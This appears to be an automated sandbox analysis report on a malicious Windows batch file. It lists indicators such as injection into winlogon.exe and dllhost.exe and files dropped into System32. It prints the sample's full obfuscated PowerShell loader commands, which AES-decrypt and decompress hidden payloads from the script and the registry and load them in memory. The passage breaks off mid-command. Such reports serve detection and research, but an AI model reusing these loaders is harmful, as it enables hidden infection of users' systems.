36682e454c21cf545e611f5b5de9115c164433a75b4b20e10e31c37e785c2a14

Analysis

max time kernel
14s
max time network
77s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
18-05-2023 05:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test_bat_c/e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat
Size

10.3MB
MD5

db149b83156f710e18e2233db671dc56
SHA1

ab3a8d2ec8edffb4ac434f11d4af01de8605f558
SHA256

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20
SHA512

21b8d53854978077ea362c75fa0ceebab864a63c62d1b4cf65fcd5d9c74db23144f824957d877825e247fae786183a672e458a7b623364a9df85df34c4c424bf
SSDEEP

49152:NgsDwfz/8H9hPHoep7Qf0f1on7wl/Y/I+3CEwYwmFK4ulynWtDWxTQP4zCrpaeNB:/

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 1148 created 596	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	winlogon.exe
PID 1252 created 596	1252	$sxr-powershell.exe	winlogon.exe

Executes dropped EXE 4 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe

pid	process
1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
1252	$sxr-powershell.exe
1216	$sxr-powershell.exe
4984	$sxr-powershell.exe

Drops file in System32 directory 6 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

description	ioc	process
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
File created	C:\Windows\System32\ucrtbased.dll	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 1148 set thread context of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1252 set thread context of 5032	1252	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 2 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

description	ioc	process
File opened for modification	C:\Windows\$sxr-powershell.exe	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
File created	C:\Windows\$sxr-powershell.exe	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe$sxr-powershell.exe

pid	process
1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1796	dllhost.exe
1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
1252	$sxr-powershell.exe
1252	$sxr-powershell.exe
1252	$sxr-powershell.exe
5032	dllhost.exe
5032	dllhost.exe
5032	dllhost.exe
5032	dllhost.exe
1252	$sxr-powershell.exe
1252	$sxr-powershell.exe
1216	$sxr-powershell.exe
1216	$sxr-powershell.exe
1216	$sxr-powershell.exe
1216	$sxr-powershell.exe
4984	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe$sxr-powershell.exe

description	pid	process
Token: SeDebugPrivilege	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Token: SeDebugPrivilege	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
Token: SeDebugPrivilege	1796	dllhost.exe
Token: SeDebugPrivilege	1252	$sxr-powershell.exe
Token: SeDebugPrivilege	1252	$sxr-powershell.exe
Token: SeDebugPrivilege	5032	dllhost.exe
Token: SeDebugPrivilege	1216	$sxr-powershell.exe
Token: SeDebugPrivilege	4984	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

cmd.exee8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 4436 wrote to memory of 1148	4436	cmd.exe	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
PID 4436 wrote to memory of 1148	4436	cmd.exe	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
PID 1148 wrote to memory of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1148 wrote to memory of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1148 wrote to memory of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1148 wrote to memory of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1148 wrote to memory of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1148 wrote to memory of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1148 wrote to memory of 1796	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	dllhost.exe
PID 1148 wrote to memory of 1252	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	$sxr-powershell.exe
PID 1148 wrote to memory of 1252	1148	e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe	$sxr-powershell.exe
PID 1252 wrote to memory of 5032	1252	$sxr-powershell.exe	dllhost.exe
PID 1252 wrote to memory of 5032	1252	$sxr-powershell.exe	dllhost.exe
PID 1252 wrote to memory of 5032	1252	$sxr-powershell.exe	dllhost.exe
PID 1252 wrote to memory of 5032	1252	$sxr-powershell.exe	dllhost.exe
PID 1252 wrote to memory of 5032	1252	$sxr-powershell.exe	dllhost.exe
PID 1252 wrote to memory of 5032	1252	$sxr-powershell.exe	dllhost.exe
PID 1252 wrote to memory of 5032	1252	$sxr-powershell.exe	dllhost.exe
PID 1252 wrote to memory of 1216	1252	$sxr-powershell.exe	$sxr-powershell.exe
PID 1252 wrote to memory of 1216	1252	$sxr-powershell.exe	$sxr-powershell.exe
PID 1252 wrote to memory of 4984	1252	$sxr-powershell.exe	$sxr-powershell.exe
PID 1252 wrote to memory of 4984	1252	$sxr-powershell.exe	$sxr-powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:596

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9b2fefe0-51f0-43cc-8125-34f7df8d80c2}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{aada895a-bbf0-4eb6-a8f7-2214905ce07a}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{289ba7cf-13ac-4d7b-a12b-49134b27d3a4}
2⤵
PID:2688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4436

C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe
"e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $vPAum = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test_bat_c\e8057880d925de1696612198fce75da7cb732e08c6c4756547484d46e25d9f20.bat').Split([Environment]::NewLine);foreach ($GNRXd in $vPAum) { if ($GNRXd.StartsWith(':: ')) { $HoqqF = $GNRXd.Substring(3); break; }; };$aXtjp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HoqqF);$eJMUB = New-Object System.Security.Cryptography.AesManaged;$eJMUB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$eJMUB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$eJMUB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vKPdCLKA1OHR7DayB6fie0GdrNgcQ/q24hCzTg7sI4k=');$eJMUB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pBAW8NcatCLMZyUq6P32MA==');$ySthJ = $eJMUB.CreateDecryptor();$aXtjp = $ySthJ.TransformFinalBlock($aXtjp, 0, $aXtjp.Length);$ySthJ.Dispose();$eJMUB.Dispose();$uNTLJ = New-Object System.IO.MemoryStream(, $aXtjp);$qowuZ = New-Object System.IO.MemoryStream;$aCWmn = New-Object System.IO.Compression.GZipStream($uNTLJ, [IO.Compression.CompressionMode]::Decompress);$aCWmn.CopyTo($qowuZ);$aCWmn.Dispose();$uNTLJ.Dispose();$qowuZ.Dispose();$aXtjp = $qowuZ.ToArray();$uCJaH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($aXtjp);$rGRlU = $uCJaH.EntryPoint;$rGRlU.Invoke($null, (, [string[]] ('')))
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ROThC);$tcAmN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAk2WftATJZWLNaz5AsOcg==');$tcAmN = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tcAmN, 0, $tcAmN.Length);$tcAmN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tcAmN);$htfqf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00vYPdm3YczDKThMGomP2t4PEP6NyfJ1C5JKdCAh6A/oUSNQeme7j6zRfYjMAujQjLMAjCD1XuFdbpYN4xDIp2LLVjDsenZDFy0y5/WsrDmlf+R2zXEEOVTkkpiynuc9nPRrX+NCyjUkdumv8qpjj3tpd8HQGoFyy3a1n9Qj6no8lIXggnt79qb7guowY2KMsZSxnWbj4puiAQ3jfajaMD/VPUBHdxyubLgHZvEHRDcthlAqFjq6T77sy2JPZiSzx9WmJFIR91f2l2OkQKkLVTuNEcaGNxHDa7BvsZX66E4L+OBfosly2Sfxw9Kdm29xZa+ilA72osygq47c33cRqYdsDL1ibti8yyxK2pTb7UOBDUZxYeZ51SUQtlQoCP/ZXugNu2/+kz+coNBmOi2AUAl+CjzWdQxH2aPTg+gDHro=');$htfqf = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($htfqf, 0, $htfqf.Length);$htfqf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($htfqf);$QZvFz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7kfx/IIgvojG1Y8ORjXrlQ==');$QZvFz = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QZvFz, 0, $QZvFz.Length);$QZvFz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QZvFz);$OWoCp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/HYssHkUfY8L1KxHOXtKvw==');$OWoCp = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OWoCp, 0, $OWoCp.Length);$OWoCp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OWoCp);$IQocv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2fDj9cGG5yOIQCzHyd0wjA==');$IQocv = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IQocv, 0, $IQocv.Length);$IQocv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IQocv);$MFEog = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vFfCR3EWJbL61LHSR35ULw==');$MFEog = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MFEog, 0, $MFEog.Length);$MFEog = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MFEog);$ezJBd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QEqy5NLkcfbNR1XhqxPmNg==');$ezJBd = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ezJBd, 0, $ezJBd.Length);$ezJBd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ezJBd);$BoSsL0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cV3Ch+wNgiNrh3nPXcEdyw==');$BoSsL0 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL0, 0, $BoSsL0.Length);$BoSsL0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL0);$BoSsL1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAuwPxztI7NTFSZO0GRx+Q==');$BoSsL1 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL1, 0, $BoSsL1.Length);$BoSsL1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL1);$BoSsL2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzza9eWYTaEjCWFmGo3rLw==');$BoSsL2 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL2, 0, $BoSsL2.Length);$BoSsL2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL2);$BoSsL3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNOahjTM/Tm2BvHo8xW75A==');$BoSsL3 = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL3, 0, $BoSsL3.Length);$BoSsL3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL3);$BOQkb.Dispose();$UAqSU1.Dispose();$Rdlce = [Microsoft.Win32.Registry]::$MFEog.$IQocv($BoSsL).$OWoCp($ROThC);$zwdFm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rdlce);$UAqSU = New-Object System.Security.Cryptography.AesManaged;$UAqSU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$rpUCK = $UAqSU.('rotpyrceDetaerC'[-1..-15] -join '')();$zwdFm = $rpUCK.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zwdFm, 0, $zwdFm.Length);$rpUCK.Dispose();$UAqSU.Dispose();$mWZFi = New-Object System.IO.MemoryStream(, $zwdFm);$rdOGT = New-Object System.IO.MemoryStream;$TtLsl = New-Object System.IO.Compression.GZipStream($mWZFi, [IO.Compression.CompressionMode]::$BoSsL1);$TtLsl.$ezJBd($rdOGT);$TtLsl.Dispose();$mWZFi.Dispose();$rdOGT.Dispose();$zwdFm = $rdOGT.ToArray();$sACye = $htfqf | IEX;$EjRHz = $sACye::$BoSsL2($zwdFm);$adjov = $EjRHz.EntryPoint;$adjov.$BoSsL0($null, (, [string[]] ($tcAmN)))
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1252).WaitForExit();[System.Threading.Thread]::Sleep(5000); $UAqSU1 = New-Object System.Security.Cryptography.AesManaged;$UAqSU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UAqSU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UAqSU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3Cejgnbs4Mq4RjjGVF0oKf3M0OGYhcUdZQT8VjA1BTQ=');$UAqSU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FuFkpEyBBb5eTiUHDuoejw==');$BOQkb = $UAqSU1.('rotpyrceDetaerC'[-1..-15] -join '')();$BoSsL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Hi9IUAdIvyu21FrLc35Wlg==');$BoSsL = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BoSsL, 0, $BoSsL.Length);$BoSsL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BoSsL);$ROThC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NuWQavY79dzw+av3Hm0iPSLwU4FiMsrTH6wKYXHnmQI=');$ROThC = $BOQkb.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ROThC, 0, $ROThC.Length);$ROThC = [System.Text.Encoding]::('8FTU'[-1..-4] -join 